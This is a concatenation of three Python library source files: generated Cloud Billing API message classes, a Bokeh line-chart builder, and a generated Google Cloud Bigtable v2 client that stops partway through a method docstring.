"""
name = _messages.StringField(1, required=True)
class CloudbillingBillingAccountsListRequest(_messages.Message):
"""A CloudbillingBillingAccountsListRequest object.
Fields:
pageSize: Requested page size. The maximum page size is 100; this is also
the default.
pageToken: A token identifying a page of results to return. This should be
a `next_page_token` value returned from a previous `ListBillingAccounts`
call. If unspecified, the first page of results is returned.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
class CloudbillingBillingAccountsProjectsListRequest(_messages.Message):
"""A CloudbillingBillingAccountsProjectsListRequest object.
Fields:
name: The resource name of the billing account associated with the
projects that you want to list. For example,
`billingAccounts/012345-567890-ABCDEF`.
pageSize: Requested page size. The maximum page size is 100; this is also
the default.
pageToken: A token identifying a page of results to be returned. This
should be a `next_page_token` value returned from a previous
`ListProjectBillingInfo` call. If unspecified, the first page of results
is returned.
"""
name = _messages.StringField(1, required=True)
pageSize = _messages.IntegerField(2, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(3)
class CloudbillingProjectsGetBillingInfoRequest(_messages.Message):
"""A CloudbillingProjectsGetBillingInfoRequest object.
Fields:
name: The resource name of the project for which billing information is
retrieved. For example, `projects/tokyo-rain-123`.
"""
name = _messages.StringField(1, required=True)
class CloudbillingProjectsUpdateBillingInfoRequest(_messages.Message):
"""A CloudbillingProjectsUpdateBillingInfoRequest object.
Fields:
name: The resource name of the project associated with the billing
information that you want to update. For example, `projects/tokyo-
rain-123`.
projectBillingInfo: A ProjectBillingInfo resource to be passed as the
request body.
"""
name = _messages.StringField(1, required=True)
projectBillingInfo = _messages.MessageField('ProjectBillingInfo', 2)
class ListBillingAccountsResponse(_messages.Message):
"""Response message for `ListBillingAccounts`.
Fields:
billingAccounts: A list of billing accounts.
nextPageToken: A token to retrieve the next page of results. To retrieve
the next page, call `ListBillingAccounts` again with the `page_token`
field set to this value. This field is empty if there are no more
results to retrieve.
"""
billingAccounts = _messages.MessageField('BillingAccount', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class ListProjectBillingInfoResponse(_messages.Message):
"""Request message for `ListProjectBillingInfoResponse`.
Fields:
nextPageToken: A token to retrieve the next page of results. To retrieve
the next page, call `ListProjectBillingInfo` again with the `page_token`
field set to this value. This field is empty if there are no more
results to retrieve.
projectBillingInfo: A list of `ProjectBillingInfo` resources representing
the projects associated with the billing account.
"""
nextPageToken = _messages.StringField(1)
projectBillingInfo = _messages.MessageField('ProjectBillingInfo', 2, repeated=True)
class ProjectBillingInfo(_messages.Message):
"""Encapsulation of billing information for a Cloud Console project. A
project has at most one associated billing account at a time (but a billing
account can be assigned to multiple projects).
Fields:
billingAccountName: The resource name of the billing account associated
with the project, if any. For example,
`billingAccounts/012345-567890-ABCDEF`.
billingEnabled: True if the project is associated with an open billing
account, to which usage on the project is charged. False if the project
is associated with a closed billing account, or no billing account at
all, and therefore cannot use paid services. This field is read-only.
name: The resource name for the `ProjectBillingInfo`; has the form
`projects/{project_id}/billingInfo`. For example, the resource name for
the billing information for project `tokyo-rain-123` would be `projects
/tokyo-rain-123/billingInfo`. This field is read-only.
projectId: The ID of the project that this `ProjectBillingInfo`
represents, such as `tokyo-rain-123`. This is a convenience field so
that you don't need to parse the `name` field to obtain a project ID.
This field is read-only.
"""
billingAccountName = _messages.StringField(1)
billingEnabled = _messages.BooleanField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
class StandardQueryParameters(_messages.Message):
"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
bearer_token: OAuth bearer token.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
pp: Pretty-print response.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
bearer_token = _messages.StringField(4)
callback = _messages.StringField(5)
fields = _messages.StringField(6)
key = _messages.StringField(7)
oauth_token = _messages.StringField(8)
pp = _messages.BooleanField(9, default=True)
prettyPrint = _messages.BooleanField(10, default=True)
quotaUser = _messages.StringField(11)
trace = _messages.StringField(12)
uploadType = _messages.StringField(13)
upload_protocol = _messages.StringField(14)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv',
package=u'cloudbilling')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1',
package=u'cloudbilling')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2',
package=u'cloudbilling')
|
|
"""This is the Bokeh charts interface. It gives you a high level API to build
complex plot is a simple way.
This is the Line class which lets you build your Line charts just
passing the arguments to the Chart class and calling the proper functions.
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
from __future__ import absolute_import
from six import iteritems
from itertools import chain
from ..builder import XYBuilder, create_and_build
from ..glyphs import LineGlyph, PointGlyph
from ..attributes import DashAttr, ColorAttr, MarkerAttr
from ..data_source import NumericalColumnsAssigner
from ...models.sources import ColumnDataSource
from ...properties import Bool, String, List
from ..operations import Stack, Dodge
# -----------------------------------------------------------------------------
# Classes and functions
# -----------------------------------------------------------------------------
def Line(data=None, x=None, y=None, **kws):
""" Create a line chart using :class:`LineBuilder <bokeh.charts.builders.line_builder.LineBuilder>` to
render the glyphs.
The line chart is typically used with column-oriented data, where each column
contains comparable measurements and the column names are treated as a categorical
variable for differentiating the measurement values. One of the columns can be used as
an index for either the x or y axis.
.. note::
Only the x or y axis can display multiple variables, while the other is used
as an index.
Args:
data (list(list), numpy.ndarray, pandas.DataFrame, list(pd.Series)): a 2d data
source with columns of data for each line.
x (str or list(str), optional): specifies variable(s) to use for x axis
y (str or list(str), optional): specifies variable(s) to use for y axis
In addition to the parameters specific to this chart,
:ref:`userguide_charts_defaults` are also accepted as keyword parameters.
.. note::
This chart type differs in input types as compared to other charts,
due to the way that line charts typically plot labeled series. For
example, a column for AAPL stock prices over time. Another way this could be
plotted is to have a DataFrame with a column of `stock_label` and columns of
`price`, which is the stacked format. Both should be supported, but the former
is the expected one. Internally, the latter format is being derived.
Returns:
:class:`Chart`: includes glyph renderers that generate the lines
Examples:
.. bokeh-plot::
:source-position: above
import numpy as np
from bokeh.charts import Line, output_file, show
# (dict, OrderedDict, lists, arrays and DataFrames are valid inputs)
xyvalues = np.array([[2, 3, 7, 5, 26], [12, 33, 47, 15, 126], [22, 43, 10, 25, 26]])
line = Line(xyvalues, title="line", legend="top_left", ylabel='Languages')
output_file('line.html')
show(line)
"""
kws['x'] = x
kws['y'] = y
return create_and_build(LineBuilder, data, **kws)
class LineBuilder(XYBuilder):
"""This is the Line class and it is in charge of plotting
Line charts in an easy and intuitive way.
Essentially, we provide a way to ingest the data, make the proper
calculations and push the references into a source object.
We additionally make calculations for the ranges.
And finally add the needed lines taking the references from the source.
"""
series_names = List(String, help="""Names that represent the items being plotted.""")
stack = Bool(default=False)
default_attributes = {'color': ColorAttr(),
'dash': DashAttr(),
'marker': MarkerAttr()}
dimensions = ['y', 'x']
column_selector = NumericalColumnsAssigner
glyph = LineGlyph
@property
def measures(self):
if isinstance(self.y.selection, list):
return self.y.selection
elif isinstance(self.x.selection, list):
return self.x.selection
else:
return None
@property
def measure_input(self):
return isinstance(self.y.selection, list) or isinstance(self.x.selection, list)
@property
def stack_flags(self):
# Check if we stack measurements and by which attributes
# This happens if we used the same series labels for dimensions as attributes
return {k: self.attr_measurement(k) for k in list(
self.attributes.keys())}
def get_id_cols(self, stack_flags):
# collect the other columns used as identifiers, that aren't a measurement name
id_cols = [self.attributes[attr].columns
for attr, stack in iteritems(stack_flags) if not stack and
self.attributes[attr].columns != self.measures and
self.attributes[attr].columns is not None]
return list(chain.from_iterable(id_cols))
def setup(self):
"""Handle input options that require transforming data and/or user selections."""
# handle special case of inputs as measures
if self.measure_input:
stack_flags = self.stack_flags
id_cols = self.get_id_cols(stack_flags)
# if we have measures input, we need to stack by something, set default
if all(attr is False for attr in list(stack_flags.values())):
stack_flags['color'] = True
# stack the measurement dimension while keeping id columns
self._stack_measures(ids=id_cols)
# set the attributes to key off of the name of the stacked measurement
source = ColumnDataSource(self._data.df)
for attr_name, stack_flag in iteritems(stack_flags):
if stack_flags[attr_name]:
default_attr = self.attributes[attr_name]
default_attr.setup(columns='series', data=source)
# Handle when to use special column names
if self.x.selection is None and self.y.selection is not None:
self.x.selection = 'index'
elif self.x.selection is not None and self.y.selection is None:
self.y.selection = 'index'
def attr_measurement(self, attr_name):
"""Detect if the attribute has been given measurement columns."""
cols = self.attributes[attr_name].columns
return (cols is not None and (cols == self.y.selection or
cols == self.x.selection))
def set_series(self, col_name):
series = self._data.df[col_name].drop_duplicates().tolist()
series = [str(item) for item in series]
self.series_names = series
def _stack_measures(self, ids, var_name='series'):
"""Stack data and keep the ids columns.
Args:
ids (list(str)): the column names that describe the measures
"""
if isinstance(self.y.selection, list):
dim = 'y'
if self.x.selection is not None:
ids.append(self.x.selection)
else:
dim = 'x'
if self.y.selection is not None:
ids.append(self.y.selection)
if len(ids) == 0:
ids = None
dim_prop = getattr(self, dim)
# transform our data by stacking the measurements into one column
self._data.stack_measures(measures=dim_prop.selection, ids=ids,
var_name=var_name)
# update our dimension with the updated data
dim_prop.set_data(self._data)
self.set_series('series')
def get_builder_attr(self):
attrs = self.properties()
return {attr: getattr(self, attr) for attr in attrs
if attr in self.glyph.properties()}
def yield_renderers(self):
build_attr = self.get_builder_attr()
# get the list of builder attributes and only pass them on if glyph supports
attrs = list(self.attributes.keys())
attrs = [attr for attr in attrs if attr in self.glyph.properties()]
for group in self._data.groupby(**self.attributes):
group_kwargs = self.get_group_kwargs(group, attrs)
group_kwargs.update(build_attr)
glyph = self.glyph(x=group.get_values(self.x.selection),
y=group.get_values(self.y.selection),
**group_kwargs)
# dash=group['dash']
# save reference to composite glyph
self.add_glyph(group, glyph)
# yield each renderer produced by composite glyph
for renderer in glyph.renderers:
yield renderer
Stack().apply(self.comp_glyphs)
Dodge().apply(self.comp_glyphs)
class PointSeriesBuilder(LineBuilder):
glyph = PointGlyph
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.bigtable.v2 Bigtable API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.path_template
import grpc
from google.cloud.bigtable_v2.gapic import bigtable_client_config
from google.cloud.bigtable_v2.gapic.transports import bigtable_grpc_transport
from google.cloud.bigtable_v2.proto import bigtable_pb2
from google.cloud.bigtable_v2.proto import bigtable_pb2_grpc
from google.cloud.bigtable_v2.proto import data_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-bigtable").version
class BigtableClient(object):
"""Service for reading from and writing to existing Bigtable tables."""
SERVICE_ADDRESS = "bigtable.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.bigtable.v2.Bigtable"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
BigtableClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def table_path(cls, project, instance, table):
"""Return a fully-qualified table string."""
return google.api_core.path_template.expand(
"projects/{project}/instances/{instance}/tables/{table}",
project=project,
instance=instance,
table=table,
)
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
"""Constructor.
Args:
transport (Union[~.BigtableGrpcTransport,
                Callable[[~.Credentials, type], ~.BigtableGrpcTransport]]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = bigtable_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=bigtable_grpc_transport.BigtableGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = bigtable_grpc_transport.BigtableGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def read_rows(
self,
table_name,
app_profile_id=None,
rows=None,
filter_=None,
rows_limit=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Streams back the contents of all requested rows in key order, optionally
applying the same Reader filter to each. Depending on their size,
rows and cells may be broken up across multiple responses, but
atomicity of each row will still be preserved. See the
ReadRowsResponse documentation for details.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> for element in client.read_rows(table_name):
... # process element
... pass
Args:
table_name (str): The unique name of the table from which to read. Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
rows (Union[dict, ~google.cloud.bigtable_v2.types.RowSet]): The row keys and/or ranges to read. If not specified, reads from all rows.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.RowSet`
filter_ (Union[dict, ~google.cloud.bigtable_v2.types.RowFilter]): The filter to apply to the contents of the specified row(s). If unset,
reads the entirety of each row.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.RowFilter`
rows_limit (long): The read will terminate after committing to N rows' worth of results. The
default (zero) is to return all results.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.bigtable_v2.types.ReadRowsResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "read_rows" not in self._inner_api_calls:
self._inner_api_calls[
"read_rows"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.read_rows,
default_retry=self._method_configs["ReadRows"].retry,
default_timeout=self._method_configs["ReadRows"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.ReadRowsRequest(
table_name=table_name,
app_profile_id=app_profile_id,
rows=rows,
filter=filter_,
rows_limit=rows_limit,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["read_rows"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def sample_row_keys(
self,
table_name,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Returns a sample of row keys in the table. The returned row keys will
delimit contiguous sections of the table of approximately equal size,
which can be used to break up the data for distributed tasks like
mapreduces.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> for element in client.sample_row_keys(table_name):
... # process element
... pass
Args:
table_name (str): The unique name of the table from which to sample row keys. Values are
of the form ``projects/<project>/instances/<instance>/tables/<table>``.
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.bigtable_v2.types.SampleRowKeysResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "sample_row_keys" not in self._inner_api_calls:
self._inner_api_calls[
"sample_row_keys"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.sample_row_keys,
default_retry=self._method_configs["SampleRowKeys"].retry,
default_timeout=self._method_configs["SampleRowKeys"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.SampleRowKeysRequest(
table_name=table_name, app_profile_id=app_profile_id
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["sample_row_keys"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def mutate_row(
self,
table_name,
row_key,
mutations,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Mutates a row atomically. Cells already present in the row are left
unchanged unless explicitly changed by ``mutation``.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `row_key`:
>>> row_key = b''
>>>
>>> # TODO: Initialize `mutations`:
>>> mutations = []
>>>
>>> response = client.mutate_row(table_name, row_key, mutations)
Args:
table_name (str): The unique name of the table to which the mutation should be applied.
Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
row_key (bytes): The key of the row to which the mutation should be applied.
mutations (list[Union[dict, ~google.cloud.bigtable_v2.types.Mutation]]): Changes to be atomically applied to the specified row. Entries are applied
in order, meaning that earlier mutations can be masked by later ones.
Must contain at least one entry and at most 100000.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Mutation`
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.bigtable_v2.types.MutateRowResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "mutate_row" not in self._inner_api_calls:
self._inner_api_calls[
"mutate_row"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.mutate_row,
default_retry=self._method_configs["MutateRow"].retry,
default_timeout=self._method_configs["MutateRow"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.MutateRowRequest(
table_name=table_name,
row_key=row_key,
mutations=mutations,
app_profile_id=app_profile_id,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["mutate_row"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def mutate_rows(
self,
table_name,
entries,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Mutates multiple rows in a batch. Each individual row is mutated
atomically as in MutateRow, but the entire batch is not executed
atomically.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `entries`:
>>> entries = []
>>>
>>> for element in client.mutate_rows(table_name, entries):
... # process element
... pass
Args:
table_name (str): The unique name of the table to which the mutations should be applied.
entries (list[Union[dict, ~google.cloud.bigtable_v2.types.Entry]]): The row keys and corresponding mutations to be applied in bulk.
Each entry is applied as an atomic mutation, but the entries may be
applied in arbitrary order (even between entries for the same row).
At least one entry must be specified, and in total the entries can
contain at most 100000 mutations.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Entry`
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.bigtable_v2.types.MutateRowsResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "mutate_rows" not in self._inner_api_calls:
self._inner_api_calls[
"mutate_rows"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.mutate_rows,
default_retry=self._method_configs["MutateRows"].retry,
default_timeout=self._method_configs["MutateRows"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.MutateRowsRequest(
table_name=table_name, entries=entries, app_profile_id=app_profile_id
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["mutate_rows"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def check_and_mutate_row(
self,
table_name,
row_key,
app_profile_id=None,
predicate_filter=None,
true_mutations=None,
false_mutations=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Mutates a row atomically based on the output of a predicate Reader filter.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `row_key`:
>>> row_key = b''
>>>
>>> response = client.check_and_mutate_row(table_name, row_key)
Args:
table_name (str): The unique name of the table to which the conditional mutation should be
applied. Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
row_key (bytes): The key of the row to which the conditional mutation should be applied.
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
predicate_filter (Union[dict, ~google.cloud.bigtable_v2.types.RowFilter]): The filter to be applied to the contents of the specified row. Depending
on whether or not any results are yielded, either ``true_mutations`` or
``false_mutations`` will be executed. If unset, checks that the row
contains any values at all.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.RowFilter`
true_mutations (list[Union[dict, ~google.cloud.bigtable_v2.types.Mutation]]): Changes to be atomically applied to the specified row if
``predicate_filter`` yields at least one cell when applied to
``row_key``. Entries are applied in order, meaning that earlier
mutations can be masked by later ones. Must contain at least one entry
if ``false_mutations`` is empty, and at most 100000.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Mutation`
false_mutations (list[Union[dict, ~google.cloud.bigtable_v2.types.Mutation]]): Changes to be atomically applied to the specified row if
``predicate_filter`` does not yield any cells when applied to
``row_key``. Entries are applied in order, meaning that earlier
mutations can be masked by later ones. Must contain at least one entry
if ``true_mutations`` is empty, and at most 100000.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Mutation`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.bigtable_v2.types.CheckAndMutateRowResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "check_and_mutate_row" not in self._inner_api_calls:
self._inner_api_calls[
"check_and_mutate_row"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.check_and_mutate_row,
default_retry=self._method_configs["CheckAndMutateRow"].retry,
default_timeout=self._method_configs["CheckAndMutateRow"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.CheckAndMutateRowRequest(
table_name=table_name,
row_key=row_key,
app_profile_id=app_profile_id,
predicate_filter=predicate_filter,
true_mutations=true_mutations,
false_mutations=false_mutations,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["check_and_mutate_row"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def read_modify_write_row(
self,
table_name,
row_key,
rules,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Modifies a row atomically on the server. The method reads the latest
existing timestamp and value from the specified columns and writes a new
entry based on pre-defined read/modify/write rules. The new value for the
timestamp is the greater of the existing timestamp or the current server
time. The method returns the new contents of all modified cells.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `row_key`:
>>> row_key = b''
>>>
>>> # TODO: Initialize `rules`:
>>> rules = []
>>>
>>> response = client.read_modify_write_row(table_name, row_key, rules)
Args:
table_name (str): The unique name of the table to which the read/modify/write rules should
